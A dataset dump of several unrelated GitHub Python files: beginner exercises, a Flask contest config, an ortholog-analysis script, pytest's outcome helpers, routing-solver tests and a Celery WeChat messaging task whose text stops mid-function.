+{"seq_id":"46402339168","text":"# Dadas dos listas, imprime el nombre junto con la edad de la persona\n# Jose 29\n# Diana 28\n# Hacer dos scripts, uno usando for y otro usando while\n\npeople = [\"Jonas\", \"Julio\", \"Mike\", \"Mez\"]\nages = [25, 30, 31, 39, 40, 60]\nemails = [\"1@t.com\", \"2@t.com\", \"3@t.com\", \"4@t.com\",\"5@t.com\"]\n\nlength = len(people)\n\n# for i in range(0, length):\n# name = people[i]\n# age = ages[i]\n# print(f\"{name} {age}\")\n\n# index = 0\n# while index < length:\n# name = people[index]\n# age = ages[index]\n# print(f\"{name} {age}\")\n# index += 1\n\nfor name, age, email in zip(people, ages, emails):\n print(f\"{name} {age} {email}\")\n","repo_name":"jotathebest/mintic_class_examples","sub_path":"P47/21-05-2021/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"43383868728","text":"import os\n\nif 'DEBUG' in os.environ and os.environ['DEBUG'] == 'True':\n DEBUG = True\n TESTING = True\nelse:\n DEBUG = False\n TESTING = False\n\n\n####################\n# CSRF configuration\n####################\n\nSECRET_KEY = os.environ['SECRET_KEY']\n# activates the cross-site request forgery prevention in Flask-WTF\nWTF_CSRF_ENABLED = True\n\n########################\n# Database configuration\n########################\n\nMYSQL_DATABASE = os.environ['MYSQL_DATABASE']\nMYSQL_USER = os.environ['MYSQL_USER']\nMYSQL_PASSWORD = os.environ['MYSQL_PASSWORD']\nMYSQL_HOST = os.environ['MYSQL_HOST']\nMYSQL_PORT = os.environ['MYSQL_PORT']\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{0}:{1}@{2}:{3}/{4}'.format(\n MYSQL_USER, MYSQL_PASSWORD, MYSQL_HOST, MYSQL_PORT, MYSQL_DATABASE\n)\nSQLALCHEMY_POOL_SIZE = 0\nUPLOAD_FOLDER = os.environ['UPLOAD_FOLDER']\n\n###############################\n# Challenge's related variables\n###############################\n\nCHALLENGE_MAX_SOURCE_SIZE_IN_MB = int(\n os.environ['CHALLENGE_MAX_SOURCE_SIZE_IN_MB'])\nCHALLENGE_MAX_MEM_COMPILATION_IN_MB = int(\n os.environ['CHALLENGE_MAX_MEM_COMPILATION_IN_MB'])\nCHALLENGE_MAX_TIME_COMPILATION_IN_SECS = int(\n os.environ['CHALLENGE_MAX_TIME_COMPILATION_IN_SECS'])\nCHALLENGE_MAX_BINARY_SIZE_IN_MB = int(\n os.environ['CHALLENGE_MAX_BINARY_SIZE_IN_MB'])\nCHALLENGE_MAX_MEM_EXECUTION_IN_MB = int(\n os.environ['CHALLENGE_MAX_MEM_EXECUTION_IN_MB'])\nCHALLENGE_MAX_TIME_EXECUTION_IN_SECS = int(\n os.environ['CHALLENGE_MAX_TIME_EXECUTION_IN_SECS'])\nCHALLENGE_NUMBER_OF_TEST_VECTORS = int(\n os.environ['CHALLENGE_NUMBER_OF_TEST_VECTORS'])\nMAX_CONTENT_LENGTH = CHALLENGE_MAX_SOURCE_SIZE_IN_MB << 20\n\nSTARTING_DATE = int(os.environ['STARTING_DATE'])\nPOSTING_DEADLINE = int(os.environ['POSTING_DEADLINE'])\nFINAL_DEADLINE = int(os.environ['FINAL_DEADLINE'])\n\n\n#############\n# Other stuff\n#############\n\nURL_COMPILE_AND_TEST = os.environ['URL_COMPILE_AND_TEST']\n\nRECAPTCHA_PUBLIC_KEY = os.environ['RECAPTCHA_PUBLIC_KEY']\nRECAPTCHA_PRIVATE_KEY = os.environ['RECAPTCHA_PRIVATE_KEY']\nRECAPTCHA_PARAMETERS = {'hl': 'en'}\n\nMAX_RANK_OF_PLOTED_CHALLENGES = 30\n","repo_name":"CryptoExperts/whibox_contest_submission_server","sub_path":"services/web-dev/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"}
+{"seq_id":"36295498065","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom numpy import log10\nfrom numpy import mean\nimport pickle as pk\nimport argparse\n\nparser = argparse.ArgumentParser(description='Extract one_to_one ortholog from ortholofinder output (use alfalfa_vs_clover file), \\\ncreate a table of raw counts and tpm of orthologs for differential expression analysis, \\\ncalculate the length of alfalfa and clover genes also for differential expression analysis')\n\nparser.add_argument('-i',required=True,help='ortholofinder output (alfalfa__v__clover.tsv)')\nparser.add_argument('-o',required=True,help='output folder')\nparser.add_argument('-at',required=True,help='alfalfa gene id and trans id tab separate file')\nparser.add_argument('-ct',required=True,help='clover gene id and trans id tab separate file')\nparser.add_argument('-as',required=True,help='salmon_merge.py alfalfa tpm output file (e.g. alfalfa_triplicate_salmon_tpm.txt)')\nparser.add_argument('-cs',required=True,help='salmon_merge.py clover tpm output file (e.g. clover_triplicate_salmon_tpm.txt)')\nparser.add_argument('-al',required=True,help='salmon_merge.py alfalfa gene length info file (e.g. alfalfa_length.txt)')\nparser.add_argument('-cl',required=True,help='salmon_merge.py clover gene length info file (e.g. alfalfa_length.txt)')\nargs = vars(parser.parse_args())\n\n\ndef ortholog_group(orth_file,af_trans_list,cl_trans_list,al_tpm,cl_tpm,out):\n alfalfa_ortholog_dict = {}\n clover_ortholog_dict = {}\n total_dict = {}\n alfalfa_out = open(out + \"/onetoone_ortholog_file.txt\",\"w\")\n ortholog_count = open(out + \"/orthologs_count.txt\",\"w\") # id transcript count file\n ortholog_geneid = open(out + \"/orthologs_geneid.txt\",\"w\") #id average tpm file \n #clover_out = open(out + \"/\" + \"clover_ortholog_file.txt\",\"w\")\n header = [\"alfalfa_geneid\",\"alfalfa_1_count\",\"alfalfa_4_count\",\"alfalfa_6_count\",\"clover_2_count\",\"clover_3_count\",\"clover_5_count\\n\"]\n header_1 = [\"alfalfa_geneid\",\"clover_geneid\",\"alfalfa_1_count\",\"alfalfa_4_count\",\"alfalfa_6_count\",\"clover_2_count\",\"clover_3_count\",\"clover_5_count\\n\"]\n header_2 = [\"alfalfa_geneid\",\"average_tpm\",\"clover_geneid\",\"average_tpm\\n\"]\n alfalfa_out.write(\"\\t\".join(header))\n ortholog_count.write(\"\\t\".join(header_1))\n ortholog_geneid.write(\"\\t\".join(header_2))\n #clover_out.write(\"clover_transid\\talfalfa_geneid\\taverage_tpm\\talfalfa_geneid\\taverage_tpm\\tortholog_group\\n\")\n al_trans_dict = {}\n cl_trans_dict ={}\n al_tpm_dict = {}\n cl_tpm_dict = {}\n ortholog_id_dict = {}\n\n\n with open(af_trans_list) as file:\n for l in file:\n info = l.strip(\"\\n\").split(\" \")\n al_trans_dict.update({info[3]:info[1]})\n with open(cl_trans_list) as file:\n for l in file:\n info = l.strip(\"\\n\").split(\" \")\n cl_trans_dict.update({info[3]:info[1]})\n #print(trans_dict)\n \n #read alfalfa tpm table\n with open(al_tpm) as file:\n lines = file.readlines()\n lines = lines[1::]\n for l in lines:\n info = l.strip(\"\\n\").split(\"\\t\")\n al_tpm_dict.update({info[0]:info[1::]})\n #read clover tpm table\n with open(cl_tpm) as file:\n lines = file.readlines()\n lines = lines[1::]\n for l in lines:\n info = l.strip(\"\\n\").split(\"\\t\")\n cl_tpm_dict.update({info[0]:info[1::]})\n \n \n with open(orth_file) as file:\n lines = file.readlines()\n lines = lines[1::]\n alfalfa_id_dict = {}\n clover_id_dict = {}\n for l in lines:\n info = l.strip(\"\\n\").split(\"\\t\")\n ortholog_group = info[0]\n alfalfa_id_list = info[1]\n clover_id_list = info[2]\n alfalfa_id = alfalfa_id_list.split(\",\")\n clover_id = clover_id_list.split(\",\")\n alfalfa_gene_id_list = alfalfa_id_list.split(\",\")\n clover_gene_id_list = clover_id_list.split(\",\")\n alfalfa_gene_id_list = list(set([al_trans_dict[i.split(\".p\")[0].strip(\" \")] for i in alfalfa_gene_id_list]))\n clover_gene_id_list = list(set([cl_trans_dict[i.split(\".p\")[0].strip(\" \")] for i in clover_gene_id_list]))\n \n if len(alfalfa_gene_id_list) == 1 and len(clover_gene_id_list) == 1:\n \n try:\n hit = alfalfa_id_dict[alfalfa_gene_id_list[0]]\n if hit == clover_gene_id_list[0]:\n pass\n else:\n alfalfa_id_dict.pop(alfalfa_gene_id_list[0])\n except:\n alfalfa_id_dict.update({alfalfa_gene_id_list[0]:clover_gene_id_list[0]})\n \n #pk.dump(alfalfa_id_dict,open(out + \"/all_ortholog.dat\",\"wb\"))\n\n mark_alfalfa_dict = list(alfalfa_id_dict.keys()) \n \n for key,value in alfalfa_id_dict.items():\n try:\n hit_1 = clover_id_dict[value]\n if hit_1 != key:\n mark_alfalfa_dict.pop(key)\n except:\n clover_id_dict.update({value:key})\n\n \n \n for id in mark_alfalfa_dict:\n alfalfa_ortholog_dict.update({id:alfalfa_id_dict[id]})\n\n #gene_id_a = al_trans_dict[id.split(\".p\")[0].strip(\" \")]\n clover_id_wirte = alfalfa_ortholog_dict[id] \n \n try:\n tpm_1 = al_tpm_dict[id][0:3]\n \n except:\n tpm_1 = [\"0\"]*3\n try:\n tpm_2 = cl_tpm_dict[alfalfa_id_dict[id]][0:3]\n except:\n tpm_2 = [\"0\"]*3\n\n\n alfalfa_out.write(\"{}\\t{}\\t{}\\n\".format(id,\"\\t\".join(tpm_1),\"\\t\".join(tpm_2)))\n ortholog_count.write(\"{}\\t{}\\t{}\\t{}\\n\".format(id,clover_id_wirte,\"\\t\".join(tpm_1),\"\\t\".join(tpm_2)))\n ortholog_geneid.write(\"{}\\t{}\\t{}\\t{}\\n\".format(id,al_tpm_dict[id][3],clover_id_wirte,al_tpm_dict[id][7]))\n \n pk.dump(alfalfa_ortholog_dict,open(out + \"/alfalfa_clover_ortholog_translation.dat\",\"wb\"))\n \n \n \n return(alfalfa_ortholog_dict)\n \ndef get_average_length(al_df,cl_df,ortholog_dict,o_table,out):\n al_df = pd.read_csv(al_df)\n cl_df = pd.read_csv(cl_df)\n total_length_list = []\n al_dict = dict(zip(al_df[\"alfalfaGeneid\"],al_df[\"Length\"]))\n cl_dict = dict(zip(cl_df[\"cloverGeneid\"],cl_df[\"Length\"]))\n out_file = open(out + \"/ortholog_avglength.txt\", \"w\")\n one_df = pd.read_table(o_table) \n header = [\"alfalfa_geneid\",\"alfalfa_1_count\",\"alfalfa_4_count\",\"alfalfa_6_count\",\"clover_2_count\",\"clover_3_count\",\"clover_5_count\\n\"]\n\n out_file.write(\"{}\\n\".format(\"\\t\".join(header)))\n for id in one_df[\"alfalfa_geneid\"]:\n length_list = [al_dict[id],cl_dict[ortholog_dict[id]]]\n average_length = mean(length_list)\n total_length_list.append(average_length)\n \n #get average use average_length\n \n alfalfa_length = [str(average_length)]*3\n #clover_length = [str(total_length_list[1])]*3\n \n out_file.write(\"{}\\t{}\\t{}\\n\".format(id,\"\\t\".join(alfalfa_length),\"\\t\".join(alfalfa_length)))\n\n #out_file.write()\n\n \n #total_df = pd.DataFrame(ortholog_dict.keys(),columns = [\"alfalfa_Geneid\"])\n #total_df[\"average_length\"] = total_length_list\n #total_df.to_csv(out + \"/ortholog_length.txt\", index= False)\n\n'''\n#draw scatter plot of alfalfa gene tpm vs. clover gene tpm \ndef draw_scatter(table,out):\n df = pd.read_table(table)\n \n fig, ax = plt.subplots()\n \n x = log10(df.iloc[:,1])\n y = log10(df.iloc[:,3])\n ax.scatter(x,y, s = 1)\n ax.set_xlabel(\"alfalfa log10 tpm\")\n ax.set_ylabel(\"clover log10 tpm\")\n #ax.set_xlim((0,500))\n #ax.set_ylim((0,500))\n fig.show()\n fig.savefig(\"{}/ortholog_tpm_scatter.png\".format(out))\n''' \n\n \n\nif __name__ == '__main__':\n '''\n ortholog_file = \"/home/rui-huang/Documents/RNA_seq_doc/OrthoFinder/Results_Apr23_1/Orthologues/Orthologues_alfalfa/alfalfa__v__clover.tsv\"\n folder = \"/home/rui-huang/Documents/RNA_seq_doc/OrthoFinder/Results_Apr23_1\"\n alfalfa_trans_id_list = \"/home/rui-huang/Documents/RNA_seq_doc/new_assembly/alfalfa_assembly/new_lacer/alfalfa_transid_2.txt\"\n clover_trans_id_list = \"/home/rui-huang/Documents/RNA_seq_doc/new_assembly/clover_assembly/new_lacer/clover_transid_2.txt\"\n alfalfa_tpm = \"/home/rui-huang/Documents/RNA_seq_doc/alfalfa_triplicate_salmon_tpm.txt\"\n clover_tpm = \"/home/rui-huang/Documents/RNA_seq_doc/clover_triplicate_salmon_tpm.txt\"\n '''\n ortholog_file = args[\"i\"]\n folder = args[\"o\"]\n alfalfa_trans_id_list = args[\"at\"]\n clover_trans_id_list = args[\"ct\"]\n alfalfa_tpm = args[\"as\"]\n clover_tpm = args[\"cs\"]\n\n \n alfalfa_ortholog_dict = ortholog_group(ortholog_file,alfalfa_trans_id_list,clover_trans_id_list,alfalfa_tpm,clover_tpm,folder)\n \n '''\n onetoone_table = folder + \"/onetoone_ortholog_file.txt\"\n alfalfa_length_df = \"/home/rui-huang/Documents/RNA_seq_doc/alfalfa_length.txt\"\n clover_length_df = \"/home/rui-huang/Documents/RNA_seq_doc/clover_length.txt\"\n '''\n onetoone_table = folder + \"/onetoone_ortholog_file.txt\"\n alfalfa_length_df = args[\"al\"]\n clover_length_df = args[\"cl\"]\n\n get_average_length(alfalfa_length_df,clover_length_df,alfalfa_ortholog_dict,onetoone_table,folder)\n \n \n '''\n orhtolog_table = \"/home/rui-huang/Documents/RNA_seq_doc/OrthoFinder/Results_Apr23_1/orthologs_count.txt\"\n \n ortholog_table = \"/home/rui-huang/Documents/RNA_seq_doc/OrthoFinder/Results_Apr23_1/orthologs_geneid.txt\"\n draw_scatter(ortholog_table,folder)\n '''\n ","repo_name":"hyhy8181994/Alfalfa_and_yellow_sweet_clover_nodule_transcriptome","sub_path":"assign_ortholog_group.py","file_name":"assign_ortholog_group.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11556461146","text":"\"\"\"\nexception classes and constants handling test outcomes\nas well as functions creating them\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport py\nimport sys\n\n\nclass OutcomeException(BaseException):\n \"\"\" OutcomeException and its subclass instances indicate and\n contain info about test and collection outcomes.\n \"\"\"\n def __init__(self, msg=None, pytrace=True):\n BaseException.__init__(self, msg)\n self.msg = msg\n self.pytrace = pytrace\n\n def __repr__(self):\n if self.msg:\n val = self.msg\n if isinstance(val, bytes):\n val = py._builtin._totext(val, errors='replace')\n return val\n return \"<%s instance>\" % (self.__class__.__name__,)\n __str__ = __repr__\n\n\nTEST_OUTCOME = (OutcomeException, Exception)\n\n\nclass Skipped(OutcomeException):\n # XXX hackish: on 3k we fake to live in the builtins\n # in order to have Skipped exception printing shorter/nicer\n __module__ = 'builtins'\n\n def __init__(self, msg=None, pytrace=True, allow_module_level=False):\n OutcomeException.__init__(self, msg=msg, pytrace=pytrace)\n self.allow_module_level = allow_module_level\n\n\nclass Failed(OutcomeException):\n \"\"\" raised from an explicit call to pytest.fail() \"\"\"\n __module__ = 'builtins'\n\n\nclass Exit(KeyboardInterrupt):\n \"\"\" raised for immediate program exits (no tracebacks/summaries)\"\"\"\n def __init__(self, msg=\"unknown reason\"):\n self.msg = msg\n KeyboardInterrupt.__init__(self, msg)\n\n# exposed helper methods\n\n\ndef exit(msg):\n \"\"\" exit testing process as if KeyboardInterrupt was triggered. \"\"\"\n __tracebackhide__ = True\n raise Exit(msg)\n\n\nexit.Exception = Exit\n\n\ndef skip(msg=\"\", **kwargs):\n \"\"\" skip an executing test with the given message. Note: it's usually\n better to use the pytest.mark.skipif marker to declare a test to be\n skipped under certain conditions like mismatching platforms or\n dependencies. See the pytest_skipping plugin for details.\n\n :kwarg bool allow_module_level: allows this function to be called at\n module level, skipping the rest of the module. Default to False.\n \"\"\"\n __tracebackhide__ = True\n allow_module_level = kwargs.pop('allow_module_level', False)\n if kwargs:\n keys = [k for k in kwargs.keys()]\n raise TypeError('unexpected keyword arguments: {0}'.format(keys))\n raise Skipped(msg=msg, allow_module_level=allow_module_level)\n\n\nskip.Exception = Skipped\n\n\ndef fail(msg=\"\", pytrace=True):\n \"\"\" explicitly fail an currently-executing test with the given Message.\n\n :arg pytrace: if false the msg represents the full failure information\n and no python traceback will be reported.\n \"\"\"\n __tracebackhide__ = True\n raise Failed(msg=msg, pytrace=pytrace)\n\n\nfail.Exception = Failed\n\n\nclass XFailed(fail.Exception):\n \"\"\" raised from an explicit call to pytest.xfail() \"\"\"\n\n\ndef xfail(reason=\"\"):\n \"\"\" xfail an executing test or setup functions with the given reason.\"\"\"\n __tracebackhide__ = True\n raise XFailed(reason)\n\n\nxfail.Exception = XFailed\n\n\ndef importorskip(modname, minversion=None):\n \"\"\" return imported module if it has at least \"minversion\" as its\n __version__ attribute. If no minversion is specified the a skip\n is only triggered if the module can not be imported.\n \"\"\"\n import warnings\n __tracebackhide__ = True\n compile(modname, '', 'eval') # to catch syntaxerrors\n should_skip = False\n\n with warnings.catch_warnings():\n # make sure to ignore ImportWarnings that might happen because\n # of existing directories with the same name we're trying to\n # import but without a __init__.py file\n warnings.simplefilter('ignore')\n try:\n __import__(modname)\n except ImportError:\n # Do not raise chained exception here(#1485)\n should_skip = True\n if should_skip:\n raise Skipped(\"could not import %r\" % (modname,), allow_module_level=True)\n mod = sys.modules[modname]\n if minversion is None:\n return mod\n verattr = getattr(mod, '__version__', None)\n if minversion is not None:\n try:\n from pkg_resources import parse_version as pv\n except ImportError:\n raise Skipped(\"we have a required version for %r but can not import \"\n \"pkg_resources to parse version strings.\" % (modname,),\n allow_module_level=True)\n if verattr is None or pv(verattr) < pv(minversion):\n raise Skipped(\"module %r has __version__ %r, required is: %r\" % (\n modname, verattr, minversion), allow_module_level=True)\n return mod\n","repo_name":"WebKit/WebKit","sub_path":"LayoutTests/imported/w3c/web-platform-tests/tools/third_party/pytest/_pytest/outcomes.py","file_name":"outcomes.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"}
+{"seq_id":"13944059498","text":"# encoding: utf8\r\n\r\n\"\"\"\r\n fonctions utiles pour la course à pied\r\n\"\"\"\r\n\r\n# ---- python ----\r\nimport sys\r\nimport doctest\r\nimport io\r\nimport re\r\nfrom math import fmod\r\nfrom datetime import datetime\r\n\r\n# ---- other ----\r\n\r\n# ---- mine ----\r\n\r\n# %% -------------------------------------------------------------------\r\n\r\ndef ekm(km, deniv):\r\n \"\"\" calcule la difficulté d'une course\r\n >>> ekm(112, 2800)\r\n 140.0\r\n >>> ekm(100, 2222)\r\n 122.22\r\n \"\"\"\r\n return km + deniv/100.\r\n\r\n# %% -------------------------------------------------------------------\r\n\r\ndef str2dt(s, an=2017):\r\n \"\"\" raccourci vers strptime pour convertir une str en datetime\r\n >>> str2dt('6/2')\r\n datetime.datetime(2017, 2, 6, 0, 0)\r\n >>> str2dt('6/2', 16)\r\n datetime.datetime(2016, 2, 6, 0, 0)\r\n >>> str2dt('6/2', 2016)\r\n datetime.datetime(2016, 2, 6, 0, 0)\r\n \"\"\"\r\n if an > 2000: an -= 2000\r\n return datetime.strptime(s + '/' + str(an), '%d/%m/%y')\r\n\r\n\r\n# %% -------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n quiet = len(sys.argv) > 1 and '-q' in sys.argv[1]\r\n if quiet:\r\n sys.stdout = io.StringIO()\r\n\r\n # ---- do the tests\r\n opts = doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE\r\n (fails, tests) = doctest.testmod(optionflags=opts)\r\n # ---- done\r\n\r\n sys.stdout = sys.__stdout__ # même si not quiet ça ne coûte rien\r\n\r\n if tests == 0:\r\n print('no tests in this file')\r\n elif tests > 0 and fails == 0: # sinon pas d'affichage c'est pénible\r\n print('%d tests successfully passed' % tests)\r\n elif quiet:\r\n print('%d tests over %d FAILED' % (fails, tests))\r\n","repo_name":"mightyFredJ/CaP","sub_path":"tools/captools.py","file_name":"captools.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29258232187","text":"import maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.mvrp_checker as mvrp_checker\nimport maps.b2bgeo.mvrp_solver.annealing_mvrp.tests_lib.tools as tools\nimport json\nimport pytest\nimport datetime\n\n\n@pytest.mark.parametrize('use_deadline', [True, False])\ndef test_depot_deadline(use_deadline):\n task = tools.get_test_json(\"depot_deadline.json\")\n\n if not use_deadline:\n for loc in task['locations']:\n if 'delivery_deadline' in loc:\n del loc['delivery_deadline']\n\n result = mvrp_checker.solve_and_check(\n json.dumps(task), None, solver_arguments={'sa_iterations': 100000})\n\n for route in result['routes']:\n deadline = float('inf')\n for node in route['route']:\n value = node['node']['value']\n if 'delivery_deadline' in value:\n time = datetime.datetime.strptime(value['delivery_deadline'], '%H:%M:%S')\n timedelta = datetime.timedelta(hours=time.hour, minutes=time.minute, seconds=time.second)\n cur_deadline = timedelta.total_seconds()\n deadline = min(deadline, cur_deadline)\n elif node['node']['type'] == 'depot' and deadline < float('inf'):\n assert (node['arrival_time_s'] <= deadline) == use_deadline\n\n\ndef test_depot_deadline_penalty():\n \"\"\"\n In this test it is impossible to satisfy all deadlines,\n we check that penalties are calculated correctly\n \"\"\"\n task = tools.get_test_json(\"depot_deadline.json\")\n\n vehicle = task['vehicles'][0]\n vehicle['max_runs'] = 1\n\n expected_metrics = {\n \"failed_time_window_locations_count\": 0,\n \"failed_time_window_locations_count_penalty\": 0,\n \"failed_time_window_locations_duration_penalty\": 0,\n \"failed_time_window_locations_duration_s\": 0,\n \"total_failed_delivery_deadline_count\": 2,\n \"total_failed_delivery_deadline_duration_s\": 20708.034934440395,\n \"total_failed_delivery_deadline_penalty\": 5549.307860249089,\n \"total_failed_time_window_count\": 0,\n \"total_failed_time_window_duration_s\": 0,\n \"total_failed_time_window_penalty\": 0,\n \"total_late_count\": 0,\n \"total_late_duration_s\": 0,\n \"total_late_penalty\": 0,\n \"total_penalty\": 5549.307860249089,\n }\n\n mvrp_checker.solve_and_check(\n json.dumps(task), None, solver_arguments={'sa_iterations': 100000},\n expected_metrics=expected_metrics)\n\n\n@pytest.mark.parametrize('return_to_depot', [True, False])\n@pytest.mark.parametrize('finish_at', [True, False])\ndef test_depot_deadline_return(return_to_depot, finish_at):\n \"\"\"\n This test checks that pickup with depot deadline is delivered to depot even if return_to_depot is false\n \"\"\"\n task = tools.get_test_json(\"depot_deadline_return.json\")\n\n vehicle = task['vehicles'][0]\n vehicle['return_to_depot'] = return_to_depot\n if not finish_at:\n del vehicle['finish_at']\n\n expected_metrics = {\n 'assigned_locations_count': 1,\n 'max_vehicle_runs': 1\n }\n\n mvrp_checker.solve_and_check(\n json.dumps(task), None, solver_arguments={'sa_iterations': 100000},\n expected_metrics=expected_metrics)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests_fast/test_depot_deadline.py","file_name":"test_depot_deadline.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8443776235","text":"if __name__ == \"__main__\":\n split_input = input().split(\"-\")\n if len(split_input) != 3 or False in [split.isnumeric() for split in split_input] or len(split_input[0]) != 4:\n print(\"Input format ERROR. Correct Format: YYYY-MM-DD\")\n exit(-1)\n\n month = int(split_input[1])\n day = int(split_input[2])\n\n days_in_month = 30 if month & 1 else 31\n if month == 2:\n days_in_month = 28\n\n new_year = int(split_input[0])\n new_month = month\n new_day = day + 1\n\n if new_day > days_in_month:\n new_month += 1\n new_day = 1\n if new_month > 12:\n new_month = 1\n new_year += 1\n\n print(f\"next date: {new_year}-{'0' if new_month < 10 else ''}{new_month}-{'0' if new_day < 10 else ''}{new_day}\")\n","repo_name":"Psekk/Bootcamp-HR","sub_path":"assignments/week2/A1W2A1.py","file_name":"A1W2A1.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6155199386","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\nfrom celery import Celery,platforms\nfrom kombu import Exchange, Queue\nfrom celery import task\nfrom config import *\nimport mysql.connector\nimport json\nimport uuid\nimport datetime\nimport time\n\nONCE_CAPACITY = 10000\nONCE_PRENUM = 10000\n\napp = Celery(\"srjob.sendmsg\", broker=amqp_url)\n\n\nplatforms.C_FORCE_ROOT = True\n\napp.conf.update(\n CELERY_TRACK_STARTED=True,\n CELERY_TASK_SERIALIZER='json',\n CELERY_ACCEPT_CONTENT=['json'], # Ignore other content\n CELERY_RESULT_SERIALIZER='json',\n CELERY_IMPORTS = (\"addsendapp\",\"preparesendapp\",\"dosendapp\",\"addJob\",\"addreward\",\"addsendmail\",\"addsendmsg\",\"addsendsms\",\"addtask\",\"custinfosync\",\"custsync\",\"doreward\",\"dosendmail\",\"dosendmsg\",\"dosendsms\",\"findJob\",\"preparereward\",\"preparesendmail\",\"preparesendsms\",\"sessionclose\",\"tagsync\",\"tasks\",\"usercheck\",),\n CELERYBEAT_SCHEDULE={\n 'find-reward-every-10-seconds': {\n 'task': 'srjob.sendmsg.find',\n 'schedule': datetime.timedelta(seconds=60),\n }\n }\n)\n\ndiff_time = time.timezone\ndef utc_now():\n return datetime.datetime.now() + datetime.timedelta(seconds=diff_time)\n\n\n@app.task(name=\"srjob.sendmsg.find\")\ndef findsendmsg():\n redisdb = ensure_redis()\n listlen = redisdb.llen(\"sendmsg\")\n for i in range(0, listlen):\n listid = redisdb.lindex(\"sendmsg\",i)\n task = redisdb.hgetall(listid)\n count = 1\n listtemplen = redisdb.llen(\"sendmsg\")\n for j in range(0, listtemplen):\n templistid = redisdb.lindex(\"sendmsg\",j)\n temptask = redisdb.hgetall(templistid)\n if temptask['status'] == 'running':\n count = count + 1\n if count > 1:\n break\n if task['status'] == 'STARTED' and task['isenable'] == '1':\n task_id = task['_id']\n taskargu = eval(task['arguments'])\n esttime = task[\"esttime\"]\n campaignid = int(taskargu[\"campaignid\"])\n wechatid = int(taskargu['wechatid'])\n customer = json.loads(taskargu['customer'])\n if datetime.datetime.strptime(esttime, \"%Y-%m-%d %H:%M:%S\") < (datetime.datetime.now() + datetime.timedelta(seconds=1)):\n try:\n redisdb.hset(listid,'status','running')\n mydb = connect()\n ensure_mysql()\n cursor = mydb.cursor()\n # 查询sql语句\n sql = \"SELECT cust.id,cust.openid FROM sr_cust_customer cust \"\n campsql = (\"SELECT filtersql from sr_campaign_filterrule where campaignid = %d\" % campaignid)\n cursor.execute(campsql)\n camprow = cursor.fetchone()\n if not camprow:\n break\n wheresql = (\"SELECT FROM_BASE64(\\\"%s\\\") as condit\" % camprow[0])\n cursor.execute(wheresql)\n whererow = cursor.fetchone()\n if not whererow:\n break\n conditions = []\n conditions.append(\"WHERE 1 = 1\")\n conditions.append(\" AND %s\" % whererow[0])\n sql = sql + ''.join(conditions)\n print(sql)\n #查询消息相关条件\n\n wechatsql = (\"SELECT id,campaignid,title,sendaccount,wechattype,sortno,author,abstract,content,linkurl,fileid,isenabled from sr_campaign_wechat where id= %d\" % (wechatid))\n print(wechatsql)\n cursor.execute(wechatsql)\n wechat = cursor.fetchall()\n wechatrow = wechat[0]\n if not wechatrow:\n break\n print(wechatrow)\n wechattype = wechatrow[4]\n if wechattype == 3:\n content = wechatrow[8]\n elif wechattype == 4:\n voicesql = (\"SELECT fileid from sr_weiapp_resource where id = %d\" % (int(wechatrow[8])))\n cursor.execute(voicesql)\n voicerow = cursor.fetchone()\n if not voicerow:\n break\n content = voicerow[0]\n elif wechattype == 5:\n videosql = (\"SELECT fileid,filename from sr_weiapp_resource where id = %d\" % (int(wechatrow[8])))\n cursor.execute(videosql)\n videorow = cursor.fetchone()\n if not videorow:\n break\n content = videorow[0]+\"@filename@\"+videorow[1]\n else :\n contentsql = (\"SELECT jsonfileid from sr_weiapp_reply_content where id = %d\" % (int(wechatrow[8])))\n cursor.execute(contentsql)\n contentrow = cursor.fetchone()\n if not contentrow:\n break\n content = contentrow[0]\n print(content)\n wechatid = wechatrow[0]\n campaignid = wechatrow[1]\n title = wechatrow[2]\n sendaccount = wechatrow[3]\n sortno = wechatrow[5]\n author = wechatrow[6]\n abstract = wechatrow[7]\n\n linkurl = wechatrow[9]\n fileid = wechatrow[10]\n isenabled = wechatrow[11]\n cursor.execute(sql)\n\n count = 0\n\n times = 0\n openids = \"\"\n while True:\n row = cursor.fetchone()\n if not row:\n break\n print(esttime)\n #esttime = datetime.datetime.strftime(esttime, \"%Y-%m-%d %H:%M:%S\")\n id = row[0]\n openid = row[1]\n\n sendmsgid = str(uuid.uuid4())\n if openid:\n openids=openids+openid.encode('utf-8')+\",\"\n count += 1\n if count % ONCE_PRENUM == 0:\n times += 1\n redisdb.hmset(\"sendmsgsync:\"+sendmsgid,{\n \"openid\":openids,\n \"custid\":id,\n \"sendmsgid\":sendmsgid,\n \"campaignid\":campaignid,\n \"sendaccount\":sendaccount,\n \"wechattype\":wechattype,\n \"content\":content,\n \"task_id\":task_id,\n \"activetime\":esttime,\n \"status\":1\n })\n redisdb.lpush(\"sendmsgsync\",\"sendmsgsync:\"+sendmsgid)\n esttime = datetime.datetime.strptime(esttime, \"%Y-%m-%d %H:%M:%S\") + datetime.timedelta(minutes=30)\n esttime = datetime.datetime.strftime(esttime, \"%Y-%m-%d %H:%M:%S\")\n openids = \"\"\n\n\n if count % ONCE_PRENUM:\n times += 1\n 